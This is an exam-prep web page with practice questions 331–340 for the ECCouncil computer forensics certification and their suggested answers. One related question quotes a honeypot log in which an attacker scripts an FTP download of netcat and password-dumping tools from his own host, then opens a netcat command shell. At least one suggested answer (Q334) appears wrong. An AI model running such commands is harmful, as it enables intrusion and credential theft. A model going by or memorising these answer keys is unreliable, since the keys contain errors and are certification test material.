ExamGecko
Search Search Login
Home Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 34

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?
William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads It to VirusTotal in order to confirm whether the file Is malicious, provide information about Its functionality, and provide Information that will allow to produce simple network signatures. What type of malware analysis was performed here?

Question 331

Report
Export
Collapse

The surface of a hard disk consists of several concentric rings known as tracks; each of these tracks has smaller partitions called disk blocks. What is the size of each block?

A.
512 bits
A.
512 bits
Answers
B.
512 bytes
B.
512 bytes
Answers
C.
256 bits
C.
256 bits
Answers
D.
256 bytes
D.
256 bytes
Answers
Suggested answer: B

Question 332

Report
Export
Collapse

In Windows Security Event Log, what does an event id of 530 imply?

A.
Logon Failure - Unknown user name or bad password
A.
Logon Failure - Unknown user name or bad password
Answers
B.
Logon Failure - User not allowed to logon at this computer
B.
Logon Failure - User not allowed to logon at this computer
Answers
C.
Logon Failure - Account logon time restriction violation
C.
Logon Failure - Account logon time restriction violation
Answers
D.
Logon Failure - Account currently disabled
D.
Logon Failure - Account currently disabled
Answers
Suggested answer: C

Question 333

Report
Export
Collapse

Which of the following technique creates a replica of an evidence media?

A.
Data Extraction
A.
Data Extraction
Answers
B.
Backup
B.
Backup
Answers
C.
Bit Stream Imaging
C.
Bit Stream Imaging
Answers
D.
Data Deduplication
D.
Data Deduplication
Answers
Suggested answer: C

Question 334

Report
Export
Collapse

Which among the following search warrants allows the first responder to get the victim's computer information such as service records, billing records, and subscriber information from the service provider?

A.
Citizen Informant Search Warrant
A.
Citizen Informant Search Warrant
Answers
B.
Electronic Storage Device Search Warrant
B.
Electronic Storage Device Search Warrant
Answers
C.
John Doe Search Warrant
C.
John Doe Search Warrant
Answers
D.
Service Provider Search Warrant
D.
Service Provider Search Warrant
Answers
Suggested answer: B

Question 335

Report
Export
Collapse

Madison is on trial for allegedly breaking into her university's internal network. The police raided her dorm room and seized all of her computer equipment. Madison's lawyer is trying to convince the judge that the seizure was unfounded and baseless. Under which US Amendment is Madison's lawyer trying to prove the police violated?

A.
The 4th Amendment
A.
The 4th Amendment
Answers
B.
The 1st Amendment
B.
The 1st Amendment
Answers
C.
The 10th Amendment
C.
The 10th Amendment
Answers
D.
The 5th Amendment
D.
The 5th Amendment
Answers
Suggested answer: A

Question 336

Report
Export
Collapse

Casey has acquired data from a hard disk in an open source acquisition format that allows her to generate compressed or uncompressed image files. What format did she use?

A.
Portable Document Format
A.
Portable Document Format
Answers
B.
Advanced Forensics Format (AFF)
B.
Advanced Forensics Format (AFF)
Answers
C.
Proprietary Format
C.
Proprietary Format
Answers
D.
Raw Format
D.
Raw Format
Answers
Suggested answer: B

Question 337

Report
Export
Collapse

Depending upon the jurisdictional areas, different laws apply to different incidents. Which of the following law is related to fraud and related activity in connection with computers?

A.
18 USC §1029
A.
18 USC §1029
Answers
B.
18 USC §1030
B.
18 USC §1030
Answers
C.
18 USC §1361
C.
18 USC §1361
Answers
D.
18 USC §1371
D.
18 USC §1371
Answers
Suggested answer: B

Question 338

Report
Export
Collapse

Linux operating system has two types of typical bootloaders namely LILO (Linux Loader) and GRUB (Grand Unified Bootloader). In which stage of the booting process do the bootloaders become active?

A.
Bootloader Stage
A.
Bootloader Stage
Answers
B.
Kernel Stage
B.
Kernel Stage
Answers
C.
BootROM Stage
C.
BootROM Stage
Answers
D.
BIOS Stage
D.
BIOS Stage
Answers
Suggested answer: A

Question 339

Report
Export
Collapse

Which of the following Event Correlation Approach checks and compares all the fields systematically and intentionally for positive and negative correlation with each other to determine the correlation across one or multiple fields?

A.
Rule-Based Approach
A.
Rule-Based Approach
Answers
B.
Automated Field Correlation
B.
Automated Field Correlation
Answers
C.
Field-Based Approach
C.
Field-Based Approach
Answers
D.
Graph-Based Approach
D.
Graph-Based Approach
Answers
Suggested answer: B

Question 340

Report
Export
Collapse

Which of the following tool creates a bit-by-bit image of an evidence media?

A.
Recuva
A.
Recuva
Answers
B.
FileMerlin
B.
FileMerlin
Answers
C.
AccessData FTK Imager
C.
AccessData FTK Imager
Answers
D.
Xplico
D.
Xplico
Answers
Suggested answer: C
Total 704 questions
Go to page: of 71
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms